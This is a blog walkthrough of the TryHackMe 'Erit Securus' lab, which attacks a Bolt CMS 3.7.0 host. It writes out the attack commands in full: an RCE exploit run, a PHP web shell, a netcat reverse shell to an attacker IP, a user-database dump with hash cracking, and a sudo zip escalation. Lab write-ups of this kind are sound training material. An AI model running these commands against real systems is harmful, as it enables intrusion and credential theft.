Tryhackme Walkthrough : Erit Securus

Today we are going to solve a Tryhackme Challenge called Erit Securus designed by 4nqr34z , you can get into room .

Hack everyday

So without wasting too much time let get in .

Level : Easy

Attacking Strategy

  • Enumeration
    • Rustscan
  • Web Enumeration
  • Exploitation of Bolt CMS
    • Remote Code execution vulnerability
  • Privilege Escalation
    • Sudo rights

Enumeration

So there is a term in the field of cybersecurity more you search more you get

We start our initial scan using Rustscan , as Rustscan is fast as compare to nmap .

rustscan 10.10.99.40 --ulimit 5000 -- -A | tee nmap_result.txt
Rustscan
Port Enumeration

So in the result we can see port 80 , 22 are open . As of my experience I touch SSH when I don’t have any door open so let enumerate the port 80 first.

Web Enumeration

After opening on port 80 we find the website design in Bolt CMS and started my hacker vision and start digging login pages , help center or any other leak after some time and head pain we get the login page as documented in official page of CMS .

Searching on official documents

After getting to login page we try the default credential “admin : password” they work and we are in the admin panel of our CMS .

Login Page

Boom we are in

Now from here we have to dig more to get some more information like version and way to upload any kind of reverse shell and we get that CMS version is 3.7.0 which is exploitable to remote code execution vulnerability , after searching on google we get a working exploit .

” We search on searchsploit but this code is not working “

Exploitation

Now after getting the exploit from GitHub it time to fire up the gun and after successfully execution of exploit we get the remote code execution

python exploit.py http://10.10.99.40 admin password 

Remote code execution

Now here we get stuck as we didn’t notice that there is no netcat on target machine so we have to put it any how .

So we put the simple php-server payload on target , so that we can do some system level things with help of php

echo '<?php system($_GET["c"]);?>'>c1.php
Putting on target machine

after succefully putting the payload we created a symbolic link of netcat so that we can share it on target with the help of python server

Hosting Netcat

Now we can call this address with help of our php payload

Transferring netcat

After we get the netcat we can now put the reverse-shell on port 4242

./nc -e /bin/sh 10.11.3.131 4242 

Here we get the our reverse shell now after doing calling the proper shell we gone go to perform privilege escalation .

Privilege Escalation

Now we get a access now our main motive is to get any how the root access so let do that process but before that let’s do some enumeration

After searching into file system one thing catch my eyes that was the database of the application . Sometime we can dump out the user data and we can use it in our own way so let dump out the database.

cd /var/www/html/app/database 
ls -la
sqlite3 bolt.db 
.tables
SELECT * from bolt_users;

we get the hash value of some users and with help of john we can crack them easily .

hash cracking

After getting the password we discover the user by checking out the passwd file

cat /etc/passwd 

and here we find the user “wileec” and now we switch to this user using crack password and we get our first flag in home directory of the wileec user .

Here we discovered the user private key under .ssh file so we download it and connect through it and we check the sudo right of the users .

Private Key of the user

Now let connect the target using ssh with private key and we discover that there is some other network is all there .

But before diving into this let look some other vector like suderos permission , suid ,etc

so we jump to check out the suderos of the user we identify that jsmith user can run zip command with sudo privilege so without thinking any thing we exploit this to get the jsmith user rights .

Now here we take the help of gtfobins to check out the exploitation way .

TF=$(mktemp -u)
sudo -u jsmith /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
/bin/bash
jsmith user

Again we check for any sudo right for this user and again we hit it

Here we get our root flag .

Hopefully you like the writeup for any query you can contact to us [email protected]

You can also dm us on twitter for query

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.